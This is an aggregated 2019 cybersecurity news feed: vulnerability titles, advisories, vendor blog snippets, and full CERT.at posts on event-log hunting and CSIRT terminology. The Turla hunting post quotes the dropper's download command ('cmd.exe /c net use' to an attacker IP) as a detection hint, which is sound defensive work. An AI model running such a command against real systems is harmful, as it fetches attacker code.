As a summer intern at Trail of Bits, I used the PlusCal and TLA+ formal specification languages to explore Ethereum’s CBC Casper consensus protocol and its Byzantine fault tolerance. This work was motivated by the Medium.com article Peer Review: CBC Casper by Muneeb Ali, Jude […]

https://blog.trailofbits.com/2019/10/25/formal-analysis-of-the-cbc-casper-consensus-algorithm-with-tla/
Volunteering with Girls Who Code
2019-10-25T04:00:00Z | 1571976000

Volunteering with Girls Who Code has been one of the most enriching and edifying experiences of my time here at Akamai. I was chosen to serve as a mentor to one of the high school students, gave the NOCC tour...

https://www.akamai.com/blog/culture/volunteering-with-girls-who-code
Watch Your Language: Our First Vyper Audit
2019-10-24T11:00:04Z | 1571914804

A lot of companies are working on Ethereum smart contracts, yet writing secure contracts remains a difficult task. You still have to avoid common pitfalls, compiler issues, and constantly check your code for recently discovered risks. A recurrent source of vulnerabilities comes from the early state of the programming languages available. Most developers are using […]

https://blog.trailofbits.com/2019/10/24/watch-your-language-our-first-vyper-audit/
Talking WAN Transformation and Managed Services with Virgin’s Network and Security Architect Frankie Stroud
2019-10-23T12:59:28Z | 1571835568

Every few weeks, yet another survey confirms enterprise interest in SD-WAN. To help inform enterprises how best to make the transition to SD-WAN, I’ve been speaking with independent engineers and network architects around the industry for their insights and suggestions. The following is the first of these interviews, with Frankie Stroud, network and security architect... The post Talking WAN Transformation and Managed Services with Virgin’s Network and Security Architect Frankie Stroud appeared first on Cato Networks.

https://www.catonetworks.com/blog/talking-wan-transformation-and-managed-services-with-virgins-network-and-security-architect-frankie-stroud/
Applications close 29 November for FIRST’s Fellowship Program named after the late Suguru Yamaguchi
2019-10-23T12:00:00Z | 1571832000

FIRST pledges to financially support up to four regions to ensure global integration of security teams Available in PDF

https://www.first.org/newsroom/releases/20191023
Security Alert (A19-10-07): Multiple Vulnerabilities in Firefox
2019-10-23T04:00:00Z | 1571803200

Mozilla has published two security advisories to address multiple browser vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Enhancing Video Streaming Quality for Exoplayer -- Part 2: Buffering Strategy to Lower Startup Time and Video On-Demand Rebuffering
2019-10-23T04:00:00Z | 1571803200

The first part of this blog series discussed about the quality of user experience (QoE) metrics and two strategies that heavily influence the QoE: the bitrate selection...

https://www.akamai.com/blog/performance/enhancing-video-streaming-quality-for-exoplayer-part-2-exoplayers-buffering-strategy-how-to-lower
Tech That Makes a Difference: Sustainability
2019-10-23T04:00:00Z | 1571803200

As the Internet grows, so does energy usage. As a result, all large tech organizations have a responsibility to monitor and improve their impact on the environment. At Akamai, we are well aware of the impact we can have, both...

https://www.akamai.com/blog/culture/tech-that-makes-a-difference-sustainability
X11 Mesa 3D Graphics Library shared memory permissions vulnerability
2019-10-23T00:00:00Z | 1571788800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0857
UK National Cyber Security Centre (NCSC) updates on the Turla Group
2019-10-21T14:37:51Z | 1571668671

Turla revealed as exploiting Iranian hacking tools and techniques to attack dozens of countries

https://www.ncsc.gov.uk/news/turla-group-behind-cyber-attack
Rays of sunshine from IoT in rainy September cyber weather
2019-10-21T12:30:11Z | 1571661011

Internet of Things and automation were rays of light in the rainy cyber weather in September. Although there are still a lot of vulnerabilities in the IoT, increasing efforts are made to patch the vulnerabilities and discover the exploiters.

https://www.kyberturvallisuuskeskus.fi/en/news/rays-sunshine-iot-rainy-september-cyber-weather
Rays of sunshine from IoT in rainy September cyber weather
2019-10-21T12:30:11Z | 1571661011

Internet of Things and automation were rays of light in the rainy cyber weather in September. Although there are still a lot of vulnerabilities in the IoT, increasing efforts are made to patch the vulnerabilities and discover the exploiters.

https://www.kyberturvallisuuskeskus.fi/en/news/rays-sunshine-iot-rainy-september-cyber-weather
Networks bring sunshine, malware and vulnerabilities thunder to August cyber weather
2019-10-21T10:52:27Z | 1571655147

The cyber weather in August was mostly rainy. There were hardly any performance incidents in communications services or DoS attacks. However, severe vulnerabilities were discovered in major software.

https://www.kyberturvallisuuskeskus.fi/en/news/networks-bring-sunshine-malware-and-vulnerabilities-thunder-august-cyber-weather
Networks bring sunshine, malware and vulnerabilities thunder to August cyber weather
2019-10-21T10:52:27Z | 1571655147

The cyber weather in August was mostly rainy. There were hardly any performance incidents in communications services or DoS attacks. However, severe vulnerabilities were discovered in major software.

https://www.kyberturvallisuuskeskus.fi/en/news/networks-bring-sunshine-malware-and-vulnerabilities-thunder-august-cyber-weather
Rahvusraamatukogu ootab esmaspäeval vanemaealisi tasuta IT-õpituppa
2019-10-18T12:17:27Z | 1571401047

Järgmise nädala esmaspäeval, 21. oktoobril kell 10–12 toimub Tallinnas Eesti Rahvusraamatukogus vanusele 55+ mõeldud tasuta õpituba „Ole IT-vaatlik“, kus saab küsida ekspertidelt nõu arvutite ning nutiseadmete kohta.

https://ria.ee/uudised/rahvusraamatukogu-ootab-esmaspaeval-vanemaealisi-tasuta-it-opituppa
Security Alert (A19-10-06): Multiple Vulnerabilities in ISC BIND
2019-10-18T04:00:00Z | 1571371200

Multiple vulnerabilities were found in ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-10-05): Multiple Vulnerabilities in Cisco Aironet Access Points
2019-10-17T04:00:00Z | 1571284800

Cisco released security advisories to address the vulnerabilities in Cisco Aironet Access Points (APs).

https://www.govcert.gov.hk/en/alerts_detail.php
YouPHPTube /objects/subscribeNotify.json.php user_id SQL injection vulnerability
2019-10-17T00:00:00Z | 1571270400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0909
YouPHPTube /objects/videoAddNew.json.php SQL injection vulnerability
2019-10-17T00:00:00Z | 1571270400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0907
YouPHPTube /objects/pluginSwitch.json.php Multiple SQL Injection Vulnerabilities
2019-10-17T00:00:00Z | 1571270400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0911
YouPHPTube /plugin/AD_Server/view/campaignsVideos.json.php id SQL injection vulnerability
2019-10-17T00:00:00Z | 1571270400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0910
YouPHPTube Encoder base64Url multiple command injections
2019-10-17T00:00:00Z | 1571270400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
YouPHPTube /objects/commentAddNew.json.php comments_id SQL injection vulnerability
2019-10-17T00:00:00Z | 1571270400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0906
YouPHPTube /objects/subscribe.json.php SQL injection vulnerability
2019-10-17T00:00:00Z | 1571270400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0908
Security Alert (A19-10-03): Multiple Vulnerabilities in Adobe Reader/Acrobat
2019-10-16T04:00:00Z | 1571198400

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-10-04): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2019)
2019-10-16T04:00:00Z | 1571198400

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-10-02): Vulnerability in Sudo
2019-10-15T04:00:00Z | 1571112000

A privilege escalation vulnerability was identified in Sudo package.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC text field value remote code execution vulnerability redux
2019-10-15T00:00:00Z | 1571097600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0860
Solving the Challenges of SD-WAN Security with Cloud-Native
2019-10-13T13:37:34Z | 1570973854

August 2019 saw a significant increase in the discovery of new malware according to statistics from AV-TEST – The Independent IT-Security Institute. In August alone, 14.44 million new malicious programs were registered by the institute, raising the total number of registered malware programs above 938 million. The sheer magnitude of these numbers provides a sobering... The post Solving the Challenges of SD-WAN Security with Cloud-Native appeared first on Cato Networks.

https://www.catonetworks.com/blog/solving-the-challenges-of-sd-wan-security-with-cloud-native/
FIRST technical colloquium – Ljubljana 2019
2019-10-11T07:54:19Z | 1570780459

Ljubljana, November 13 – 14, 2019 In cooperation with Forum of Incident Response and Security Teams (FIRST), and the Geneva Centre for Security Sector Governance (DCAF), the Slovenian Computer Emergency … The post FIRST technical colloquium – Ljubljana 2019 appeared first on SI CERT.

https://www.cert.si/en/first-tc-2019-en/
Faster JWT Key Rotation in API Gateway
2019-10-11T04:00:00Z | 1570766400

JSON Web Tokens (JWT) use digital signatures to establish the authenticity of the data they contain, as well as authenticating the identity of the signer. A valid signature check ensures that any party can rely on the contents and the...

https://www.akamai.com/blog/news/verify-jwt-with-json-web-key-set-jwks-in-api-gateway
Data in the dark: Data protection
2019-10-11T04:00:00Z | 1570766400

Hyperconnectivity is on the rise and, as a result, corporations' capacity to protect their own and their customers' data becomes more and more limited. Connection takes place over a network, so, as connection increases, that network increases in size

https://www.akamai.com/blog/culture/data-in-the-dark-data-protection
Security Alert (A19-10-01): Multiple Vulnerabilities in Microsoft Products (October 2019)
2019-10-09T04:00:00Z | 1570593600

Microsoft has released security updates addressing multiple vulnerabilities and which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
NitroPDF ICCBased Color Space Remote Code Execution Vulnerability
2019-10-09T00:00:00Z | 1570579200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0817
NitroPDF Page Kids Remote Code Execution Vulnerability
2019-10-09T00:00:00Z | 1570579200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0819
NitroPDF CharProcs Remote Code Execution Vulnerability
2019-10-09T00:00:00Z | 1570579200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0816
NitroPDF Stream Length Memory Corruption Vulnerability
2019-10-09T00:00:00Z | 1570579200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0830
NitroPDF jpeg2000 yTsiz Remote Code Execution Vulnerability
2019-10-09T00:00:00Z | 1570579200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0815
NitroPDF jpeg2000 ssizDepth Remote Code Execution Vulnerability
2019-10-09T00:00:00Z | 1570579200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0814
Schneider Electric Modicon M580 UMAS REST API getcominfo denial-of-service vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0866
Schneider Electric Modicon M580 UMAS REST API readbolarray information disclosure vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0868
Schneider Electric Modicon M580 Mismatched Firmware Image FTP Upgrade Denial of Service Vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0825
Schneider Electric Modicon M580 UMAS REST API getcominfo information disclosure vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0867
Schneider Electric Modicon M580 malformed firmware image FTP upgrade denial-of-service vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0824
Schneider Electric Modicon M580 outdated firmware image FTP upgrade denial-of-service vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0847
Schneider Electric Modicon M580 FTP firmware update loader service denial-of-service vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0822
Schneider Electric Modicon M580 TFTP server information disclosure vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0851
Schneider Electric Modicon M580 UMAS cleartext data transmission vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0826
Schneider Electric Modicon M580 FTP cleartext authentication vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0827
Schneider Electric Modicon M580 FTP incomplete firmware update denial-of-service vulnerability
2019-10-08T00:00:00Z | 1570492800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0823
CVE-2019-13559
2019-10-08T00:00:00Z | 1570492800

USE OF HARD-CODED CREDENTIALS CWE - 798 The affected product is shipped with pre-configured hard-coded credentials that may allow root-user access to the controller. A limited application of the affected product may ship without setup and configuration instructions immediately available to the end user. The bulk of controllers go into applications requiring the GE commissioning engineer to change default configurations during the installation process.

https://claroty.com/team82/disclosure-dashboard/cve-2019-13559
CVE-2019-13554
2019-10-08T00:00:00Z | 1570492800

IMPROPER AUTHORIZATION CWE-285 The affected product has an unsecured Telnet protocol that may allow a user to create an authenticated session using generic default credentials.

https://claroty.com/team82/disclosure-dashboard/cve-2019-13554
Multi-Party Computation on Machine Learning
2019-10-04T14:13:15Z | 1570198395

During my internship this summer, I built a multi-party computation (MPC) tool that implements a 3-party computation protocol for perceptron and support vector machine (SVM) algorithms. MPC enables multiple parties to perform analyses on private datasets without sharing them with each other. I defveloped a technique that lets three parties obtain the results of machine […]

https://blog.trailofbits.com/2019/10/04/multi-party-computation-on-machine-learning/
Do you know these basic information security skills?
2019-10-04T06:24:54Z | 1570170294

Making sure that your information is kept secure is a key skill in the digital world. Our new guide contains simple tips for better information security both at home and at work.

https://www.kyberturvallisuuskeskus.fi/en/news/do-you-know-these-basic-information-security-skills
Do you know these basic information security skills?
2019-10-04T06:24:54Z | 1570170294

Making sure that your information is kept secure is a key skill in the digital world. Our new guide contains simple tips for better information security both at home and at work.

https://www.kyberturvallisuuskeskus.fi/en/news/do-you-know-these-basic-information-security-skills
TSC Frequency For All: Better Profiling and Benchmarking
2019-10-03T10:58:24Z | 1570100304

Have you ever tried using LLVM’s X-Ray profiling tools to make some flame graphs, but gotten obscure errors like: ==65892==Unable to determine CPU frequency for TSC accounting. ==65892==Unable to determine CPU frequency. Or worse, have you profiled every function in an application, only to find the sum of all function runtimes accounted for ~15 minutes […]

https://blog.trailofbits.com/2019/10/03/tsc-frequency-for-all-better-profiling-and-benchmarking/
The Secure Access Service Edge (SASE) as Described in Gartner’s Hype Cycle for Enterprise Networking, 2019
2019-10-02T06:49:01Z | 1569998941

In its recent Hype Cycle for Enterprise Networking, 2019, Gartner recognized Cato Networks as a “Sample Vendor” in the Secure Access Service Edge (SASE) category. Below is the verbatim text of the SASE section from the Gartner report. To better understand SASE, check out this summary on Secure Access Service Edge (SASE) or read this... The post The Secure Access Service Edge (SASE) as Described in Gartner’s Hype Cycle for Enterprise Networking, 2019 appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-secure-access-service-edge-sase-as-described-in-gartners-hype-cycle-for-enterprise-networking-2019/
RIA üleskutse: aita vanematel turvaliselt internetis toimetada
2019-10-01T05:51:49Z | 1569909109

Riigi Infosüsteemi Amet (RIA) alustab 1. oktoobril küberturvalisuse kampaaniaga, mis keskendub küberteadlikkuse tõstmisele vanemaealiste seas, kes ei ole sealsetest ohtudest nii hästi informeeritud. Kampaania koduleht www.itvaatlik.ee koondab lihtsad nõuanded turvaliselt internetis toimetamiseks.

https://ria.ee/uudised/ria-uleskutse-aita-vanematel-turvaliselt-internetis-toimetada
Lançamento do Roadmap para as Capacidades Mínimas de Cibersegurança abre o Mês Europeu de Cibersegurança
2019-10-01T00:00:00Z | 1569888000

Outubro é o mês Europeu da Cibersegurança e o CNCS assinala hoje a sua abertura com formação e sensibilização para as empresas. Tendo em conta as várias iniciativas que irão decorrer ao longo do mês, a novidade deste ano centra-se no lançamento de um roteiro que as empresas podem seguir para atingirem patamares mínimos de cibersegurança. O instrumento em causa fornece um caminho e estabelece as prioridades das ações que devem ser tomadas para atingir o que definimos como um patamar mínimo de cibersegurança para as empresas. Este instrumento segue uma lógica de que as empresas devem ser capazes de realizar esta ação, devendo para isso estar aptas para identificar as ameaças e reagir devidamente.Este Roadmap para as capacidades mínimas em Cibersegurança, de adesão voluntária, está vocacionado sobretudo para as Pequenas e Médias Empresas (PME). Posteriormente, será criado um site onde cada empresa poderá fazer a sua própria autoavaliação, de forma a que o CNCS aconselhe os próximos passos a seguir.Recorde-se que ao longo do Mês, o CNCS irá percorrer o país de Norte a Sul e abordar os temas da “Ciber-Higiene” e das “Tecnologias Emergentes”, junto de empresas do setor público e privado, universidades e outros serviços públicos.

https://dyn.cncs.gov.pt/pt/detalhe/art/551/lancamento-do-roadmap-para-as-capacidades-minimas-de-ciberseguranca-abre-o-mes-europeu-de-ciberseguranca
Maximizing Onboarding: Giving managers the skills for success
2019-09-30T04:00:00Z | 1569816000

Managing teams come with challenges as well as rewards. Managers drive individual and team performance, and the best managers drive employee connection and engagement. Akamai believes that employees are our biggest asset; by effectively and efficiently integrating them into the...

https://www.akamai.com/blog/culture/maximizing-onboarding-giving-managers-the-skills-for-success
Foxit PDF Reader JavaScript Array.includes remote code execution vulnerability
2019-09-30T00:00:00Z | 1569801600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0793
Tethered jailbreaks are back
2019-09-27T19:09:08Z | 1569611348

Earlier today, a new iPhone Boot ROM exploit, checkm8 (or Apollo or Moonshine), was published on GitHub by axi0mX, affecting the iPhone 4S through the iPhone X. The vulnerability was patched in devices with A12 and A13 CPUs. As of this writing, the iPhone XS, XS Max, XR, 11, 11 Pro and 11 Pro Max […]

https://blog.trailofbits.com/2019/09/27/tethered-jailbreaks-are-back/
Security Alert (A19-09-07): Multiple Vulnerabilities in Apple devices
2019-09-27T04:00:00Z | 1569556800

Apple has released iOS 12.4.2, iOS 13.1 and iPadOS 13.1 to fix multiple security vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
From the Beginning: Internships With Akamai
2019-09-27T04:00:00Z | 1569556800

At Akamai, our internships are both unique and meaningful. What do we mean by this? Well, we believe an internship should add real, significant value to an intern's skill-set. So, not only do they get to learn on the job...

https://www.akamai.com/blog/culture/from-the-beginning-internships-with-akamai
The Finnish Transport and Communications Agency Traficom organises the first ever 5G Cyber Security Hackathon in Oulu, 29 November to 1 December 2019
2019-09-26T14:06:34Z | 1569506794

The world’s leading cyber security experts come together to find ways to safeguard our future digital society.

https://www.kyberturvallisuuskeskus.fi/en/news/finnish-transport-and-communications-agency-traficom-organises-first-ever-5g-cyber-security
The Finnish Transport and Communications Agency Traficom organises the first ever 5G Cyber Security Hackathon in Oulu, 29 November to 1 December 2019
2019-09-26T14:06:34Z | 1569506794

The world’s leading cyber security experts come together to find ways to safeguard our future digital society.

https://www.kyberturvallisuuskeskus.fi/en/news/finnish-transport-and-communications-agency-traficom-organises-first-ever-5g-cyber-security
Security Alert (A19-09-06): Multiple Vulnerabilities in Cisco Products
2019-09-26T04:00:00Z | 1569470400

Cisco released security advisories to address the vulnerabilities in Cisco IOS, IOS XE, IOS XR and NX-OS software.

https://www.govcert.gov.hk/en/alerts_detail.php
Analysis of CVE-2019-14994 - Jira Service Desk Path Traversal leads to Massive Information Disclosure
2019-09-26T00:00:00Z | 1569456000

The CVE-2019-14994 vulnerability allows an attacker, if able to access the customer portal, to traverse to the administrative portal and view issues within all Jira projects contained in the vulnerable instance. This could include Jira Service Desk projects, Jira Core projects, and Jira Software projects

https://samcurry.net/analysis-of-cve-2019-14994
Topinambour & Windows event logs
2019-09-25T12:41:44Z | 1569415304

TL;DR: Block outgoing SMB traffic if you can. Hunt or Monitor for event ID 106 in "Microsoft-Windows-TaskScheduler%4Operational.evtx". Think about enabling "Audit Process creation" in "Security.evtx" and command line logging. Hunt or monitor for event ID 4688 in "Security.evtx". While reading through the recent Kaspersky report on the renewed arsenal of the Turla group, I was first getting a little bit frustrated by the fact that it is still too easy for the attackers. After coming over this I focused on the question "How would I detect/hunt for it in Windows event logs?"First of all, according to the report outgoing SMB is used by the dropper to download the next stage. Blocking outgoing SMB is not a new recommendation and while this still fits the "too easy for attackers" category it has nothing to do with event logs and is not the reason behind this blog post. Accepting that security is not only about prevention but also about detection brings us back to the aforementioned question.The dropper function "make_some_noise" generates a new scheduled task on an infected machine to gain persistence. Focusing on Win7+ here, this generates the event ID 106 "Scheduled Task created" in "Microsoft-Windows-TaskScheduler%4Operational.evtx". This log entry includes the time when the task was added, which user added it and the name of the task. If you go hunting for this event ID, make sure you are looking into the right event log file; as far as I know there is no guarantee that event IDs are unique accross all possible event logs. Not every new Scheduled Task is per se evil, but if you start looking and investigating, you will quickly end up with a list of expected/known good tasks. And before saying "No, too much work": Do you actually know how often this happens on your clients?Later in the report the section "KopiLuwak dropper" mentioned how a malicious JavaScript is downloaded. Following the trend of using tools already present on systems "cmd.exe" is used to run "net use" for downloading. So if "cmd.exe" is started this creates at least one process which can be logged by Windows (not enabled by default). By itself a "cmd.exe" process might not be overly suspicious, but what if we could also get the complete command line including arguments? And again Windows has something for us: if enabled, the process creation event also includes the supplied arguments.Enable process creation logging: run gpedit.msc with administrative rights, navigate the following path: "Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> System Audit Policies -> Detailed Tracking" and set the value for "Audit Process Creation" to either "Success" or "Success and Failure" This would give you the event ID 4688 in the "Security.evtx" log.To enable the inclusion of the supplied command line arguments: run gpedit.msc with administrative rights, navigate the following path: "Computer Configuration-> Windows Settings -> Administrative Templates -> System -> Audit Process Creation" and set the value for "Include command line in process creation events" to enabled. Enabling this will give you the supplied arguments in the 4688 event enabled above.Microsoft provides a nice description as well, which you can refer to for additional reading. In case your system language is different from English, your exact path may vary due to localisation.Now let me raise a question: "Is it normal for a standard user to run 'cmd.exe /c net use \\$IP-ADDRESS\...'?" I would say it's not and therefore seeing this in an event log can be considered an investigative hint, or can be an event triggering an investigation in a SOC team.I'm not saying building up a centralized monitoring of Windows client event logs including relevant events is easy or that using event logs is the only way for detection. What I'm saying is: if you don't do it, you are missing a lot of incredibly useful information for SOC teams as well as client administrators.Author: Olaf Schwarz

https://www.cert.at/en/blog/2019/7/blog-20190716140317-2501
MeliCERTes Training in Vienna
2019-09-25T12:41:42Z | 1569415302

From March 11th to March 13th CERT.at hosted an introductory MeliCERTes Training which covered the basic functionalities of the applications used in MeliCERTes as well as the topic of CSIRT maturity as laid down in the SIM3 model and covered by the CSIRT maturity self-assessment survey by ENISA.Together with teams from the Czech Republic, Hungary, Italy, and Croatia, as well as the trainers from the MeliCERTes consortium we spent three days looking into the MeliCERTes project and discussing how it could be improved to better meet the needs and expectations of CERTs/CSIRTs in the EU.We also had the possibility to talk to the leading software engineer about the current status of the project as well as what remains to be done.During the labs and excercises a number of bugs were found and noted by the trainers to pass them on to the developers. Additionally, the hands-on part spawned a lot of questions about the technical and implementational details of the platform and the applications it provides in the default configuration. The discussions which followed helped all participants to evaluate MeliCERTes more objectively for their particular situations.In summary we had three days to learn about MeliCERTes in general, get to know its design goals but also have a look at its current technical as well as architectural shortcomings. The attendees also provided a lot of feedback to the trainers about what MeliCERTes is expected to be capable of once it is to be used productively by CSIRTS/CERTs in Europe on a daily basis.Thanks to all participants and trainers, we are looking forward to the upcoming exercises and stresstests. We hope these will prove the usefulness of the project for the CSIRT community. This blog post is part of a series of blog posts related to our CEF-Telcom-2016-3 project, which also supports our participation in the CSIRTs Network. Author: Dimitri Robl

https://www.cert.at/en/blog/2019/3/blog-20190314155535-2411
New PGP-Keys
2019-09-25T12:41:41Z | 1569415301

Since our "old" (2014 vintage) PGP-keys are near their expiry date, we have generated a new set of keys. They are available via our usual CERT.at PGP keyring.A transition-document, (inline) signed with both old & new keys, can be found at key-transition-2019.txt.Author: Robert Waldner

https://www.cert.at/en/blog/2019/3/blog-20190313145649-2393
IntelMQ 1.1.1 released
2019-09-25T12:41:40Z | 1569415300

On Tuesday we have released IntelMQ version 1.1.1 which is a pure maintenance release with bugfixes only. The documentation for the version 1.1.1 and the installation instructions can be found on our github repository.The development of the next minor release 1.2.0 including new features is happening in parallel and already has a long list of improvements and new bots. This blog post is part of a series of blog posts related to our CEF-Telcom-2016-3 project, which also supports our participation in the CSIRTs Network. Author: Otmar Lendl

https://www.cert.at/en/blog/2019/1/blog-20190116142628-2366
CEF-2018-3 project submitted
2019-09-25T12:41:39Z | 1569415299

CERT.at submitted a proposal under objective 1 for the CEF-TC-2018-3 call. We hope we will get funding, since this will allow us to improve the MeliCERTes platform and also work on a set of nice new cool features for IntelMQ, which is maintained at CERT.at and widely used throughout the community.   Author: L. Aaron Kaplan

https://www.cert.at/en/blog/2018/11/blog-20181126171105-2318
"National CERT" vs. "National CSIRTs"
2019-09-25T12:41:38Z | 1569415298

The NIS Directive built upon previous work in the space of network and information security and also tried to use the established language of the field. This worked - up to a point. I'm trying to summarize the differences and pitfalls regarding the term "national CSIRT"."CERT" vs. "CSIRT"Initially, a team that took care of computer and network security incidents was called a "CERT", a "Computer Emergency Response Team". That term got trademarked by Carnegie Mellon University and they give licenses to all legit teams who want to use that word.To get around the trademark issue, the term "CSIRT - Computer Security Incident Response Team" was introduced. In the European academic and research network community, the task force dealing with this topic is thus called "TF-CSIRT".Both terms used to mean the same thing. CERT/CSIRT Designation/AccreditationThere is no one-fits-all answer to the question "What is the criteria according to which a security team can call itself a real CERT/CSIRT? ". Here are some indicators: The right to use the CERT trademark (granted by CMU/CERT-CC) Membership in FIRST (the global association of CSIRTs) Registration/Accreditation/Certification in the Trusted Introducer Directory Formal designation as CSIRT by a national authority according to the national implementation of the NIS-D (Article 9) Listed on the ENISA CSIRT map Membership in the CSIRTs Network Membership in regional CERT associations (e.g. German CERT-Verbund, EGC) Reputation as a valuable peer built over years of collaboration with other CSIRTs There is, regrettably, a huge potential for misunderstanding here. Not every CSIRT fulfills point 4 from this list, but in some contexts it might be somehow implied. Perhaps it would be best if we introduce a term like "NIS-CSIRT" for such teams."CERT/CSIRT Taxonomy"CERTs vary a lot: they range from small teams protecting a single company up to being a section of a large "NCSC - national cyber security center". There have been some steps to create a taxonomy of CERTs: a systematic way to describe teams. I have not seen a fully-fledged document about this, but one could start by answering the following questions: Protect what? Computer Infrastructure: - CSIRT Product Security: - PSIRT Relation to Constituency? Part of same organization: e.g. siemens-cert CSIRT services are part of some other contract: NREN-CERTs, ISP abuse teams, some GovCERTs, financed by chamber of commerce (or similar) ... Outsourced/Contracted CSIRT service No contractual relationship: national CERTs (Maybe even CSIRT/Constituency relation defined by law) Definition of the Constituency? Geographic boundary: city, state, country, region, global Specific sector: government, military, academics, sectors of the critical infrastructure or operators of essential services, ... Specific Company: e.g. Siemens AG Role of the CSIRT? Advisory role only Reporting requirements exist CSIRT can order countermeasures An overview of teams active in Europe can be found in the ENISA CSIRTs repository, the Trusted Introducer Directory, and the FIRST Members map "National CERT"One special type of CERT/CSIRT has always been the "national CERT". As I see it, the national CERT of a country is the team that has the broadest remit: it is supposed to take care of the whole country. That is, of course, not possible in the same way that a company CERT can take care of the infrastructure of the company. Thus, for a national CERT usually the following points apply: Principle of Subsidiarity: If there is another CERT more closely associated with the affected system, then that team will take care of the incident. A national CERT is the "default" or "fallback" CERT. The "national CERT" will act as information hub: both inside the country as well as a point of contact for the country for foreign CERTs. Its role is usually rather hands-off: it will provide guidance, publish warnings, incident notification and will not generally provide on-site remediation help. CERT-CC organizes a yearly meeting of such national CSIRTs (usually the weekend after the FIRST Conference). It defines a "National CSIRT" as:A computer emergency response team (CSIRT) with National Responsibility (or "National CSIRT") is a CSIRT that is designated by a country or economy to have specific responsibilities in cyber protection for the country or economy. A National CSIRT can be inside or outside of government, but must be specifically recognized by the government as having responsibility in the country or economy.The CERT-CC webpage also lists such teams. ENISA wrote in the 2009 document "Baseline capabilities for national / governmental CERTs" National CERT Informal definition: a CERT that acts as national point of contact (PoC) for information sharing (like incident reports, vulnerability information and other) with other national CERTs in the EU Member States and worldwide. National CERTs can be considered as "CERT of last resort", which is just another definition of a unique national PoC with a coordinating role. In a lot of cases a national CERT also acts as governmental CERT. Definitions may vary across the EU Member States! There is usually just one CERT per country that claims the role of the "national CERT", but this is not set in stone. For example, SWITCH-CERT and GovCERT.ch share this role for Switzerland. CSIRTs according to the NIS DirectiveEarly drafts of the directive used the term "CERT", the authors switched to "CSIRT" to avoid the trademark issue.Here are some of the relevant quotes from the NIS-D:Recital (34) [...] In order for all types of operators of essential services and digital service providers to benefit from such capabilities and cooperation, Member States should ensure that all types are covered by a designated CSIRT. Given the importance of international cooperation on cybersecurity, CSIRTs should be able to participate in international cooperation networks in addition to the CSIRTs network established by this Directive. Article 91.Each Member State shall designate one or more CSIRTs which shall comply with the requirements set out in point (1) of Annex I, covering at least the sectors referred to in Annex II and the services referred to in Annex III, responsible for risk and incident handling in accordance with a well-defined process. A CSIRT may be established within a competent authority.[...]4.Member States shall inform the Commission about the remit, as well as the main elements of the incident- handling process, of their CSIRTs. 5.Member States may request the assistance of ENISA in developing national CSIRTs.To summarize: There are a number of relevant industries (Operators of Essential Services [OES] + Digital Service Providers [DSP]) that a group of CSIRTs in each Member State collectively need to cover. There can be a single CSIRTs covering all, or the responsibility can be split over multiple CSIRTs. The only requirement from the NIS-D is that every identified OES/DSP must have a CSIRT (which is qualified according to Annex I) assigned to it.The term "national CSIRT" appears here for the first time in the whole directive. I've talked to the Austrian team that was involved in the negotiations of the directive, and I asked them if the text is referencing the concept of the "National CERT" as described above. The clear answer I got is "no, this is just shorthand for a designated (according to Art 9 1.) CSIRT in a Member States".There are two clear indications that this is the correct interpretation: There is no definition of a "national CSIRT" in the NIS-D, nor a reference to an external definition. The NIS-D is exclusively concerned about the critical infrastructure (OES+DSP), it does not cover the security of the rest of a country: other industries, small and medium enterprises, or private citizens. Those are covered by the old definition of a "national CERT's constituency". Another data-point here are the FAQs to the Connecting Europe Facilities Call "CEF TELECOM - 2018-3", when discussing the interpretation of "national CSIRTs". See e.g. the answer to question 17:Yes, it is possible for CSIRTs that cover a specific sector or service to be funded under this call, if they have been designated by a Member State as a CSIRT pursuant to Article 9 of the NIS Directive.Or the answer to question 18:A CSIRT is considered eligible in the sense of the call if it has been designated by a Member State as a CSIRT 